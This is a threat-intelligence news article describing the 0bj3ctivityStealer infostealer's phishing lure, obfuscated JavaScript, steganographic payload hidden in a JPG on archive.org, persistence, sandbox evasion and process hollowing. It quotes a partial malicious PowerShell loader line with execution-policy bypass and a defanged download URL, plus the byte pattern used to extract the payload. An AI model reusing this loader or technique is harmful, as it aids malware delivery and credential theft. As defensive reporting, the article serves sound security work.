0bj3ctivityStealer’s Execution Chain Unveiled With It’s New Capabilities and Exfiltration Techniques

The cybersecurity landscape continues to witness the emergence of sophisticated information-stealing malware, with 0bj3ctivityStealer representing one of the most recent and concerning additions to this threat ecosystem.

Initially discovered by HP Wolf Security experts earlier this year, this advanced stealer has demonstrated a comprehensive arsenal of data exfiltration capabilities targeting a wide variety of applications and sensitive information repositories.

The malware’s sophisticated approach to credential harvesting and system infiltration has positioned it as a significant threat to both individual users and enterprise environments.

The attack methodology employed by 0bj3ctivityStealer follows a well-orchestrated multi-stage execution chain that begins with carefully crafted phishing campaigns.

These malicious emails, typically bearing subjects like “Quotation offer,” contain low-quality images of fabricated purchase orders designed to entice victims into clicking download links.

The social engineering component leverages the promise of high-quality document versions to redirect unsuspecting users to cloud storage platforms, specifically Mediafire, where the initial payload awaits deployment.

Trellix Advanced Research Center (ARC) analysts identified this novel campaign during proactive threat hunting operations, uncovering the malware’s uncommon deployment techniques that set it apart from conventional information stealers.

The researchers noted the sophisticated use of custom PowerShell scripts combined with steganographic techniques to conceal subsequent payload stages, representing an evolution in malware delivery mechanisms that successfully evades traditional detection systems.

The global impact assessment reveals that 0bj3ctivityStealer has achieved widespread distribution across multiple continents, with particularly high detection volumes concentrated in the United States, Germany, and Montenegro.

This geographic distribution pattern suggests an opportunistic rather than targeted approach, with government institutions and manufacturing companies representing the most affected sectors.

The malware’s non-discriminatory targeting methodology indicates a broad-spectrum threat that poses risks to organizations across various industries and geographic regions.

Steganographic Payload Concealment and Multi-Stage Deployment

The technical sophistication of 0bj3ctivityStealer becomes most apparent in its innovative use of steganography for payload concealment and deployment.

The initial JavaScript script, containing over 3,000 lines of code with only 60 lines representing actual malicious functionality, serves as an obfuscation mechanism that effectively hides the embedded PowerShell payload.

This obfuscated PowerShell script subsequently downloads a seemingly benign JPG image from archive.org, which contains the next execution stage hidden within its visual data.

The steganographic extraction process involves searching for a specific hexadecimal pattern (0x42 0x4D 0x32 0x55 0x36 0x00 0x00 0x00 0x00 0x00 0x36 0x00 0x00 0x00 0x28 0x00) within the downloaded image file.

Once located, the malware reads RGB pixel values to reconstruct the hidden .NET DLL payload, with the first four bytes indicating payload size and subsequent data containing the actual executable code along with junk data for additional obfuscation.

powershell -w hidden -noprofile -ep bypass -c "$bombylius="$otolite = "VkFJ'; $bonibell =
[System.Convert]::FromBase64String($otolite);$roentgenoscopes =
[System.Text.Encoding]::UTF8.GetString($bonibell);Add-Type -AssemblyName
System.Drawing;$stouts="https://archive[.]org/download/wp4096799-lost-in-space-
wallpapers_20250610/wp4096799-lost-in-space-wallpapers.jpg";

This extracted payload functions as the VMDetector Loader, establishing persistence through scheduled task creation while simultaneously performing comprehensive virtualization and sandbox detection checks.

The loader then retrieves the final 0bj3ctivityStealer payload from a Cloudflare-managed subdomain, implementing process hollowing techniques to inject the malware into legitimate Windows processes like Regasm.exe, thereby maintaining stealth while executing its comprehensive data exfiltration operations.

Integrate ANY.RUN TI Lookup with your SIEM or SOAR To Analyses Advanced Threats -> Try 50 Free Trial Searches